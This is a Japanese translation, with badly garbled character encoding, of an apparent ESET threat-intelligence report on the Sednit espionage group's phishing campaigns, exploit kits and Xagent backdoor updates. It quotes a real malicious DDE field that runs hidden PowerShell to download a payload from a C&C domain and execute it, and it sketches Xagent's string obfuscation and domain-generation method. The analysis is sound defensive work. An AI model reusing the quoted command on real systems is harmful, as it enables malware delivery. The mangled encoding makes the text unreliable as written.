ãã®èšäºã¯ã2017幎11æã«éå¬ãããBlueHatã«ã³ãã¡ã¬ã³ã¹ã§çºè¡šãããESETãã¬ãŒã³ããŒã·ã§ã³ã®çµæããŸãšãããã®ã§ãã 2016幎ã®åãã«ã2014幎ãã2016幎ãŸã§ã®Sednitã®æŽ»åã«é¢ãã調æ»ãå ¬ââéããŸããã ãã以æ¥ãã°ã«ãŒãã®éå¶ãç£èŠãç¶ããä»æ¥ã¯äž»èŠãªãã£ã³ããŒã³ãšæŽæ°ãããããŒã«ã®æŠèŠã玹ä»ããŸãã ã¬ããŒãã®æåã®éšåã§ã¯ãã¿ãŒã²ããã·ã¹ãã ã䟵害ããæ°ããæ¹æ³ã«ã€ããŠèª¬æããŸãã 2çªç®ã®éšåã¯ããŒã«ã®é²åã«å°å¿µããã°ã«ãŒãã®äž»å補åã®çŠç¹ã¯Xagentãã«ãŠã§ã¢ã§ãã
ãã£ã³ããŒã³
è¿å¹ŽãSednitã°ã«ãŒãã¯è€æ°ã®æ¹æ³ã䜿çšããŠãæšçã®ã³ã³ãã¥ãŒã¿ãŒã«ãã«ãŠã§ã¢ãé ä¿¡ããŠããŸãã éåžžãæ»æã¯æªæã®ãããªã³ã¯ãŸãã¯æ·»ä»ãã¡ã€ã«ãå«ããã£ãã·ã³ã°ã¡ãŒã«ã§å§ãŸããŸãã ãã ããã¡ãœããã¯å¹ŽéãéããŠå€æŽãããŠããŸãã éå»ã«ã°ã«ãŒããæãé »ç¹ã«Sedkitã䜿çšããŠããå Žåã2016幎æ«ãããšã¯ã¹ããã€ãã»ããã¯å®å šã«æ¶æ» ããŸããã ã¬ããŒãã®å ¬éåŸãã°ã«ãŒãã¯DealersChoiceãã©ãããã©ãŒã ã«åãæ¿ããŸãããããã¯ããWord DDEãå«ãä»ã®ãã¯ãã«ã芳å¯ããŸããã
次ã®3ã€ã®ã»ã¯ã·ã§ã³ã§ã¯ãSednitãªãã¬ãŒã¿ãŒãã¿ãŒã²ããã·ã¹ãã ã®è¶³å ŽãåŸãããã«äœ¿çšããæ¹æ³ã«ã€ããŠèª¬æããŸãã ååãšããŠãæ»æè ã¯Seduploaderãã¡ãŒã¹ãã¹ããŒãžããã¯ãã¢ãã€ã³ã¹ããŒã«ããŠã被害è ã調æ»ããè¿œå ã®ãã«ãŠã§ã¢ãããŠã³ããŒãããããšããŸãã 䟵害ãããã·ã¹ãã ã«é¢å¿ãããå Žåãã¡ã€ã³ã®Xagentããã¯ãã¢ãšãšãã«ã€ã³ã¹ããŒã«ãããå¯èœæ§ãé«ããªããŸãã
SedkitïŒSednit Exploit KitïŒ
Sedkitã¯ãSednitã®ã¿ã䜿çšãããšã¯ã¹ããã€ãã®ã»ããã§ãã 掻åæéäžããã®ã°ã«ãŒãã¯ãäž»ã«Adobe FlashãInternet Explorerãªã©ã®ããŸããŸãªã¢ããªã±ãŒã·ã§ã³ã®è匱æ§ãæªçšããŸããã
SedkitãçºèŠããããšããæœåšçãªç ç²è ã¯æ£æ°Žç©Žãã¿ãŒã³ã䜿çšããŠã©ã³ãã£ã³ã°ããŒãžã«ãªãã€ã¬ã¯ããããŸããã ãã®åŸãã°ã«ãŒãã¯ãæœåšçãªè¢«å®³è ã«éä¿¡ãããé»åã¡ãŒã«ã«åã蟌ãŸããæªæã®ãããªã³ã¯ã®äœ¿çšã«åãæ¿ããŸããã Sedkitã®ã¯ãŒã¯ãããŒã¯æ¬¡ã®ãšããã§ãã
2016幎8æãã9æã«ãããŠãSedkitã®ã©ã³ãã£ã³ã°ããŒãžã«åä¿¡è ãåŒãä»ããããã«èšèšãããããã€ãã®ã¡ãŒã«ãã£ã³ããŒã³ã確èªããŸããã åœæãã»ããããã°ã«ãŒãã¯äžå€®ãšãŒãããã®å€§äœ¿é€šãšæ¿å ã®ã¹ã¿ããã«èå³ãæã£ãŠããŸããã 次ã®å³ã¯ããã¥ãŒã¹ã¬ã¿ãŒã®äŸã瀺ããŠããŸãã
æçŽã®ç®çã¯ãåä¿¡è ã«ãªã³ã¯ããã©ãããããšã§ãã å®å ã¯ã2016幎8æã®ããŒãè¿éã®å°éã«é¢ããèšäºãèªãããã«æåŸ ãããŠããŸãã ãœãŒã¹ã¯ä¿¡é Œã§ãããšèããããŠããŸãã ãã ãããã®æçŽã«ã¯å°ãªããšã2ã€ã®åœã®ãã³ããå«ãŸããŠããŸããSednitã¡ãŒãªã³ã°ãªã¹ãã§ããèŠãããã¹ãã«ãã¹ïŒããšãã°ããGreetigsïŒãïŒãšURLã®ãã¡ã€ã³éšåã§ãã ããã¯æªæã®ãããã¡ã€ã³ã§ãããURLãã¹ã®äžéšã¯æ£åœãªãœãŒã¹ãžã®å®éã®ãªã³ã¯ãæš¡å£ããŠããŸãã ãã®å ŽåãURLã¯ããã€ãã£ããã®ç©ºè»ã®èšäºãšåãã§ãã
ããã¯äžè¬çãªSednitã®æŠè¡ã§ãã人æ°ã®ããèšäºã䜿çšãããªã³ã¯ããã©ã£ããŠãŒã¶ãŒãã¬ã¿ãŒããSedkitã®ã©ã³ãã£ã³ã°ããŒãžã«ãªãã€ã¬ã¯ããããã®åŸãæ£åœãªãµã€ãã«ãªãã€ã¬ã¯ãããŸãã 空è»ã«å ããŠãã°ã«ãŒãã¯ããšããšããŠããã£ã³ãã³ã»ãã¹ãã®ãã¥ãŒã¹ããã䜿çšããŸãã
Sadkitãåç §ãã以äžã®æåã¯ãããã€ãã®èå³æ·±ãæ©èœã瀺ããŠããŸãã
第äžã«ãæçŽã®äž»é¡ãšURLã¯çµåããŸãããã·ãªã¢ãšã¢ã¬ããã«é¢ããæçŽããããŠãªã³ã¯ã¯WADAãšããã·ã¢ã®ããã«ãŒãã«é¢ããèšäºã«ã€ãªãããŸãã 第äºã«ã2ã€ã®ã€ã¥ãã®ééãããããŸãããã§ã«è¿°ã¹ããGreetigsïŒããšãUnited Nationsãã§ã¯ãªããUnated Nationsãã§ãã åœé£åºå ±éšã®ãããã®åŸæ¥å¡ãééããªã眲åããããšãé¡ã£ãŠããŸãã
Sedkitã䜿çšããæåŸã®ãã£ã³ããŒã³ã¯2016幎10æã«èšé²ãããŸããã èå³æ·±ãããšã«ãSedkitã®æ¶å€±ã¯ãä»ã®ãšã¯ã¹ããã€ããããã§èŠ³å¯ãããåŸåãšäžèŽããŠããŸãã ã»ãšãã©ã®ãããã®äžæ žã«ã¯ãå€ãããŒãžã§ã³ã®Internet Explorerã®ãšã¯ã¹ããã€ãããã©ã€ããã€ããŠã³ããŒãæ»æçšã®FlashããããŸãã 2016幎äžã«åœŒãïŒSedkitãå«ãïŒã§ã®æäœã®æ°ãæžå°ããã®ã¯ãã³ãŒãä¿è·ã匷åããããã®MicrosoftãšAdobeã®æªçœ®ã«ãããã®ãããããŸããã
Sedkitã®æäœã®è©³çŽ°ã¯ãåãã¬ããŒãã§é瀺ãããŠããŸãã
ãã£ãŒã©ãŒéžæ
2016幎8æãPalo Alto Networksã¯ãSednitãæåã®ã·ã¹ãã æ®åã«äœ¿çšããæ°ãããã©ãããã©ãŒã ã«é¢ããæçš¿ãå ¬éããŸããã DealersChoiceãšåŒã°ãããã©ãããã©ãŒã ã䜿çšãããšãAdobe Flash Playerãçµã¿èŸŒãŸããæªæã®ããããã¥ã¡ã³ããçæã§ããŸãã
ãã©ãããã©ãŒã ã«ã¯2ã€ã®ãªãã·ã§ã³ããããŸãã æåã®ãã®ã¯ãã·ã¹ãã ã«ã€ã³ã¹ããŒã«ãããŠããFlash Playerã®ããŒãžã§ã³ã確èªãã3ã€ã®è匱æ§ã®ãããããéžæããŸãã 2çªç®ã¯æåã«ç®¡çCïŒCãµãŒããŒã«æ¥ç¶ããéžæãããšã¯ã¹ããã€ããšæçµãã€ããŒããé ä¿¡ããŸãã ãã¡ãããã¿ãŒã²ããã·ã¹ãã ã«é ä¿¡ãããããã¥ã¡ã³ãã«ã¯ãã¹ãŠã®ãããºã«ã®ããŒã¹ããå«ãŸããŠããªãããã2çªç®ã®ãªãã·ã§ã³ã®åæã¯ããå°é£ã§ãã
Sednitã¯çŸåšãDealersChoiceãã©ãããã©ãŒã ããŸã 䜿çšããŠããŸãã Sedkitã®ã¹ããŒã ã®ããã«ãæ»æè ã¯åœéãã¥ãŒã¹ã远跡ããããããžã®ãªã³ã¯ãæªæã®ããã¡ãã»ãŒãžã«å«ããŸãã ããã°ã«ãŒãã¯ãæ¿æ²»ããããé¢ããä»ã®ã¹ããŒã ã䜿çšããããšããããŸãã 2016幎12æãããªãéå®åã®é€ã䜿çšãããŸããã
ãã®æçŽã¯ã12æ22ã23æ¥ã«ãšãŒãããã®å€åçãšå€§äœ¿é€šã«éãããŸããã Word圢åŒã®ã¯ãªã¹ãã¹ã«ãŒããæ·»ä»ãããŸããã Sednitã¯åããŠãå°æ¿åŠçã§ã¯ãªã件åã®ãã£ãã·ã³ã°ã¡ãŒã«ã䜿çšããŸããã æ·»ä»ãã¡ã€ã«ããããã¥ã¡ã³ããéããšãDealersChoiceã䜿çšããŠã·ã¹ãã ã䟵害ããè©Šã¿ãéå§ãããŸãã
Sednitã°ã«ãŒãã¯2016幎ã®çµããã«DealersChoiceãé »ç¹ã«äœ¿çšããŠããŸãããããã®åŸãã©ãããã©ãŒã ã¯é·ãéã¬ãŒããŒãã姿ãæ¶ããŸããã2017幎ã«ã10æã«æåã«äœ¿çšãããŸããã
ãã®ãã£ã³ããŒã³ã§äœ¿çšãããŠãããµã³ãã«ã¬ã¿ãŒã¯ãããŸããããããšãææžã«åºã¥ããŠãã¿ãŒã²ããã¯æ¿åºæ©é¢ã®åŸæ¥å¡ã§ãããšæ³å®ã§ããŸãã DealersChoiceã䜿çšããä»ã®ãã£ã³ããŒã³ããã»ãã¥ãªãã£ã®å°é家ã«ãã£ãŠç 究ãããŠããŸãã ããšãã°ã Proofpointã¬ããŒã㯠ãAdobe Flash Playerã®æ°ããè匱æ§ãDealersChoiceãã©ãããã©ãŒã ã«è¿œå ããããšã«ã€ããŠèªã£ãŠããŸããããã¯ãSednitã°ã«ãŒãã«ãããã©ãããã©ãŒã ã®ç©æ¥µçãªäœ¿çšãšãã®ç¶ç¶çãªéçºã瀺ããŠããŸãã
ãã¯ããVBAããã³DDE
SedkitãšDealersChoiceã«å ããŠãSednitã°ã«ãŒãã¯ãMicrosoft Officeããã¥ã¡ã³ãã®ãã¯ãã䜿çšããŠãã¿ãŒã²ããã·ã¹ãã ã䟵害ããå®èšŒæžã¿ã®æ¹æ³ãåŒãç¶ã䜿çšããŠããŸãã ä»ã®æ¹æ³ããããŸãã 倧ããªæ³šç®ãéãããã£ã³ããŒã³ã®1ã€ã¯ã2017幎4æã«æ±ãšãŒãããã®å€åçã察象ãšãããã®ã§ããã å€åçã®åœ¹äººã¯æ¬¡ã®æçŽãåãåããŸããã
æ·»ä»ãã¡ã€ã«ã«ã¯ãããŒã«ã«ç¹æš©ææ ŒïŒLPEïŒãšãªã¢ãŒãã³ãŒãå®è¡ïŒRCEïŒã®2ã€ã®0æ¥è匱æ§ã䜿çšããã³ãŒããå«ãŸããŠããŸããã Microsoftã®è匱æ§ãå ±åããŸããã ãã£ã³ããŒã³ã®åæã«ã€ããŠã¯ã ããã°ãã芧ãã ãã ã
æåŸã®äŸã¯ãSednitããŒã ãæ°ããã»ãã¥ãªãã£éçºã«çŽ°å¿ã®æ³šæãæã£ãŠããããšã瀺ããŠããŸãã 2017幎10æäžæ¬ã SensePostã®ç 究è ã¯Dynamic Data Exchange ProtocolïŒDDEïŒã«é¢ããèšäºãå ¬éããŸããã DDEã¯ç°ãªãã¢ããªã±ãŒã·ã§ã³éã§ã®åçãªããŒã¿äº€æã®æ©èœã§ãããããšãã°ãExcelææžã«å«ãŸããããŒã¿ã§Wordã®ããŒãã«ãæŽæ°ã§ããŸãã 䟿å©ã§ãããå°ãªããšãWordãšExcelã§ã¯ããŠãŒã¶ãŒãããã€ãã®èŠåãç¡èŠããå Žåããããã³ã«ã䜿çšããŠä»»æã®ã³ãŒããå®è¡ã§ããŸãã èšäºã®å ¬éåŸãŸããªããSednitãã£ã³ããŒã³ãéå§ãããDDEã䜿çšããŠCïŒCãµãŒããŒããã³ãŒããå®è¡ããŸããã McAfeeã«ãã£ãŠææžåããããããã®ãã£ã³ããŒã³ã§ã¯ããã€ãããã¥ã¡ã³ãã¯ç©ºã§ããã次ã®ã³ãŒãã®é ããã£ãŒã«ããå«ãŸããŠããŸãã
DDE
"C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # " "a slow internet connection" "try again later"
æœåšçãªè¢«å®³è ãããã¥ã¡ã³ããéããèŠåãç¡èŠãããšããã®ã¹ã¯ãªãããå®è¡ãããSeduploaderãã€ããªãã¡ã€ã«ãCïŒCãµãŒããŒããããŒããããã¿ãŒã²ããã·ã¹ãã ã§å®è¡ãããŸãã
ããã¯ãã¬ããŒãã®çºè¡ä»¥éã«Sednitã䜿çšãã劥åææ³ã®æŠèŠã§ãã ã芧ã®ããã«ããã®ã°ã«ãŒãã¯ãäžçã®ããŸããŸãªåœã®æ¿åºæ©é¢ã§ãããã®å©çã®ç¯å²ã§ã以åãšåãããã«æŽ»çºã§ãã
ããŒã«ããã
åã®ã»ã¯ã·ã§ã³ã§ã¯ãSednitã°ã«ãŒããææãã¯ãã«ã«é¢ããŠ2017幎ãã©ã®ããã«è²»ããããã瀺ããŠããŸãã ããã«ãããŒã«ãããã®å€æŽã«ã€ããŠèª¬æããŸãã ãã¹ãŠã®ã³ã³ããŒãã³ãã®åæã¯ã 2016 ã¬ããŒãã«ãããŸãã
ãã®ã°ã«ãŒãã¯ãé·å¹Žã«ããã£ãŠãã¿ãŒã²ããã·ã¹ãã ã®æ å ±ãææãåéãããã³çãããã®å€ãã®ããŒã«ãäœæããŠããŸããã ãããã®ããã€ãã¯å»æ¢ãããããã€ãã¯æçµæ±ºå®ãããŸãã
ã»ãããŒããŒ
Seduploaderã¯åµå¯ããŒã«ãšããŠäœ¿çšãããŸãã ããã¯ããããããŒãšã€ã³ã¹ããŒã«ããå®æ°ãã€ããŒãã®2ã€ã®å¥åã®ã³ã³ããŒãã³ãã§æ§æãããŠããŸãã
Seduploaderã¯åŒãç¶ãSednitããŒã ã§äœ¿çšãããŠããŸãããæ¹è¯ãããŠããŸãã 2017幎ã®4æã®ãã£ã³ããŒã³äžã«ãã¹ã¯ãªãŒã³ã·ã§ãããCïŒCãµãŒããŒããã¡ã¢ãªã«ããŠã³ããŒãããæ©èœãªã©ãæ°æ©èœãåããããŒãžã§ã³ãç»å ŽããŸããã æè¿ãSeduploaderãã€ããŒããé ä¿¡ããPowerShellã³ãã³ãããããããŒã«çœ®ãæãã£ãŠããããšã«æ°ä»ããŸããã
Xtunnel
Xtunnelã¯ãã€ã³ã¿ãŒãããäžã®CïŒCãµãŒããŒãšããŒã«ã«ãããã¯ãŒã¯äžã®ã¯ãŒã¯ã¹ããŒã·ã§ã³éã®ãããã¯ãŒã¯ããã¬ãŒã¹ã§ãããããã¯ãŒã¯ãããã·ããŒã«ã§ãã Xtunnelã¯ãŸã ã°ã«ãŒãã§äœ¿çšãããŠããŸãã
ã»ãããã
Sedkitã¯ãSednitã°ã«ãŒãã®äžé£ã®ãšã¯ã¹ããã€ãã§ãããæ£åœãªãã®ãæš¡å£ããURLã䜿çšããæšçåãã£ãã·ã³ã°ã¡ãã»ãŒãžããå§ãŸãæšçåæ»æã§ã®ã¿äœ¿çšãããŸãã Sedkitã®äœ¿çšãæåŸã«ç¢ºèªããã®ã¯2016幎10æã§ããã
ã»ãã¬ã³
Sedrecoã¯ã¹ãã€æŽ»åã«äœ¿çšãããããã¯ãã¢ã§ãããåçã«ããŒãããããã©ã°ã€ã³ã䜿çšããŠãã®æ©èœãæ¡åŒµã§ããŸãã ããã¯ããããããŒãšã€ã³ã¹ããŒã«ããå®æ°ãã€ããŒãã®2ã€ã®å¥åã®ã³ã³ããŒãã³ãã§æ§æãããŠããŸãã 2016幎4æ以éããã®ã³ã³ããŒãã³ãã®åäœã¯ç¢ºèªãããŠããŸããã
USBStealer
USBStealerã¯ãã€ã³ã¿ãŒãããåé¢ã·ã¹ãã ããæ©å¯æ å ±ãæœåºãããããã¯ãŒã¯ããŒã«ãšããŠäœ¿çšãããŸãã 2015幎åã°ä»¥éããã®ã³ã³ããŒãã³ãã®åäœã¯ç¢ºèªãããŠããŸããã
Xagent
Xagentã¯ãããŒãã®ã³ã°ããã¡ã€ã«ãã£ã«ã¿ãªã³ã°ãªã©ã®ã¹ãã€ãŠã§ã¢æ©èœãåããã¢ãžã¥ãŒã«åŒããã¯ãã¢ã§ãã ããã¯Sednitã®ãã©ãã°ã·ããããã¯ãã¢ã§ãããã°ã«ãŒããªãã¬ãŒã·ã§ã³ã§åºã䜿çšãããŠããŸãã LinuxãšWindowsã®åæããŒãžã§ã³ã¯æ°å¹Žåã«çºèŠããã2015幎ã«ã¯iOSåã ã1幎åŸã¯Androidåã ã2017幎ã®åãã«ã¯OS XåãããããŸããã
2017幎2æã«ãXagent for Windowsã®æ°ããããŒãžã§ã³ãçºèŠããŸããã ãã€ããªãã¡ã€ã«ã®æ¬¡ã®è¡ã«åºã¥ããŠããããããã¯ãã¢ã®4çªç®ã®ããŒãžã§ã³ã§ãããšçµè«ä»ããŸããã Xagentã¢ãžã¥ãŒã«ã®ããŸããŸãªããŒãžã§ã³ãè¡š1ã«ãªã¹ãããŸãã
è¡š1. XagentããŒãžã§ã³
*ãã®ã¢ãžã¥ãŒã«ãæ¢ç¥ã®ã¢ãžã¥ãŒã«ãšäžèŽãããããšã¯ã§ããŸãã
Xagentã®4çªç®ã®ããŒãžã§ã³ã¯ãæååãé£èªåããããã®æ°ããã¡ãœãããåãåããŸãããRTTIãé£èªåãããŠããŸãã ãããã®æ¹æ³ã¯ãæååã®æå·åãå€§å¹ ã«æ¹åããŸã;ãã®æ¹æ³ã¯ããã€ããªãã¡ã€ã«ããšã«äžæã§ãã XORã®åŸ©å·åã«äœ¿çšãããXagentã®ä»¥åã®ããŒãžã§ã³ã æ°ããæå·åã¢ã«ãŽãªãºã ã¯ãã³ã³ãã€ã«æ®µéã§çæãããå¯èœæ§ãé«ãå€ãæã€äžé£ã®æäœã§ãã ã³ãŒãã®è€éãã次ã®å³ã«ç€ºããŸãã
ãã ããHexRaysãã³ã³ãã€ã©ãŒã¯ãããåçŽåã§ããŸãã
return (((((a2 ^ (((((((((((a1 - 13 + 42) ^ 0x7B) + 104) ^ 0x72) - 81 - a2 â
76) ^ 0x31) + 75) ^ 0x3B) + 3) ^ 0x40) + 100) ^ 0x1C ^ 0xA9) + 41) ^ 0xB9) -
65) ^ 0xA) % 256;
AgentKernelã¯ãCïŒCãµãŒããŒããã³ãã³ããåä¿¡ããŠââãã¢ãžã¥ãŒã«ããã³ãã£ãã«ãšå¯Ÿè©±ã§ããŸãã æ¢ç¥ã®ããŒã ã®äžéšãåé€ãããããã€ãã®æ°ããããŒã ãç»å ŽããŸããã
以åã®ããŒãžã§ã³ã§ã¯ã4çªç®ã®ããŒãžã§ã³ã§åé€ãããã³ãã³ã2ãPING_REQUESTããµããŒããããŠããŸããã ãã ãããªãã¬ãŒã¿ãŒã¯GET_AGENT_INFOã³ãã³ãã䜿çšããŠã¢ãžã¥ãŒã«ã®ãªã¹ããååŸã§ããŸãã ã³ãã³ã34ã35ãããã³36ã¯ãã«ãŒãã«ãªããžããªã§ããLocalStorageãšã®å¯Ÿè©±ãå¯èœã«ããSET_PARAMETERSã«äŒŒãŠããŸãã CïŒCãµãŒããŒãšéä¿¡ããããã®ãã¡ã€ã«ã¹ãã¬ãŒãžãšãããŸããŸãªæ§æãã©ã¡ãŒã¿ãŒãä¿åããããã®ã¬ãžã¹ããªãå«ãŸããŠããŸãã
WinHttpãã£ãã«ã«å®è£ ãããæ°ããæ©èœã¯ãããã¯ã¢ãããã¡ã€ã³çšã®ãã¡ã€ã³çæã¢ã«ãŽãªãºã ïŒDGAïŒã§ãã WinHttpã¯ãCïŒCãµãŒããŒãšã®éä¿¡ãæ åœãããã£ãã«ã§ãã æ¬äŒŒä¹±æ°ããåæå€ãåãåºãéåžžã®DGAãšã¯ç°ãªããæå®ããããµã³ãã«ã«å¯ŸããŠæå®ãããçªå·ïŒã³ã³ãã€ã«äžã«çæãããå¯èœæ§ããããŸãïŒãåãåããŸãã ãã¡ã€ã³ãçæããæ¹æ³ã¯æ¬¡ã®ãšããã§ãã
-äžé£ã®æäœãåæçªå·ã«é©çšãããŸã
-çµæã¯ã3ã€ã®ç°ãªãé åã«åå·®ãäžããŸãïŒåé åã«ç°ãªãåæçªå·ãè¿œå ããããšã«ããïŒ
-æ°ããåå·®ïŒåå·®+åææ°ïŒãèšç®ããåŸãåèªã埩å·åãããŸã
-ãã¹ãŠã®åèªãæ¥ç¶ãããŠããŸãïŒ4ã€ã®åèªã¯ãã¡ã€ã³ã®çæã«äœ¿çšããã4çªç®ã®åèªã¯æåã®é åããã®ãã®ã§ãããåå·®ãç°ãªããŸãïŒ
-ã.comããè¿œå
ç¶ç¶çãªæ¹è¯ãšäž»èŠãã©ãããã©ãŒã ãšã®äºææ§ã®ãããã§ãXagentã¯Sednitã°ã«ãŒãã®äž»èŠãªããã¯ãã¢ã§ãã
ãã£ãŒã©ãŒéžæ
DealersChoiceã¯ãåã蟌ã¿Adobe Flashãã¡ã€ã«ãå«ãæªæã®ããããã¥ã¡ã³ããçæãããã©ãããã©ãŒã ã§ãã Palo Alto Networkã¯ããã©ãããã©ãŒã ã®2ã€ã®ããŒãžã§ã³ã調æ»ããŸãããA-ãã€ããŒããšå ±ã«ããã±ãŒãžåãããFlash Playerãšã¯ã¹ããã€ãã³ãŒããå«ãã¹ã¿ã³ãã¢ãã³ããŒãžã§ã³ãšãB-ãªã³ããã³ãã§ãšã¯ã¹ããã€ããããŠã³ããŒãããã¢ãžã¥ã©ãŒããŒãžã§ã³ã§ãã 2016幎ã«æ°ããã³ã³ããŒãã³ããç»å ŽããçŸåšã䜿çšãããŠããŸãã
ããŠã³ãã«ã
Downdelphã¯ãDelphiã§æžããã軜éã®ããŒãããŒããŒã§ãã åè¿°ããããã«ã2013幎11æãã2015幎9æãŸã§ã¢ã¯ãã£ãã§ããããæ°ããããŒãžã§ã³ã¯ãããŸããã§ããã
ãããã«
Sednitã¯ãŸã ã¢ã¯ãã£ãã§ãã ã¿ãŒã²ããã·ã¹ãã ãžã®äž»èŠãªãšã³ããªãã€ã³ãã¯ãã£ãã·ã³ã°ã¡ãŒã«ã§ããããã®æ¹æ³ã¯äŸç¶ãšããŠæå¹ã§ãããšæãããŸãã ãªãã¬ãŒã·ã§ã³ã®äžå¿ã«ã¯Xagentããããã¢ãã€ã«ãã©ãããã©ãŒã ãå«ããã¹ãŠã®äžè¬çãªãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã®ããŒãžã§ã³ããããŸãã ããã¯ãã¢ã®ææ°ããŒãžã§ã³ã¯éåžžã«èå³æ·±ããã®ã§ããããªãã¬ãŒã¿ãŒã¯æããã«ããã«å€ãã®åãçµã¿ãããŸããã çºèŠä»¥æ¥ã2ã€ã®ããŒãžã§ã³ã®Xagentã芳å¯ããŸããã1ã€ã¯ãã£ãã«ãšæªç¥ã®ã¢ãžã¥ãŒã«ããã1ã€ã¯ãã¹ãŠã®ã¢ãžã¥ãŒã«ãšãã£ãã«ãåããŠããŸãããæªç¥ã®ã¢ãžã¥ãŒã«ã¯ãããŸããã ã°ã«ãŒããç®æšã®æ€èšŒã®å¥ã®ã¬ãã«-Xagentãããã€ãã®ã¢ãžã¥ãŒã«ã§ããŒããã-ãè¿œå ãããšä»®å®ã§ããŸãã 被害è ãé¢å¿ãæã£ãŠããå Žåã圌女ã¯å¥ã®å®å šã«æ©èœããããŒãžã§ã³ã®ããã¯ãã¢ãåãåããŸãã
䟵害ã€ã³ãžã±ãŒã¿
è¡š2.ãã£ãã·ã³ã°
è¡š3. Seduploaderã®ãµã³ãã«
è¡š4. Xagentã®ãµã³ãã«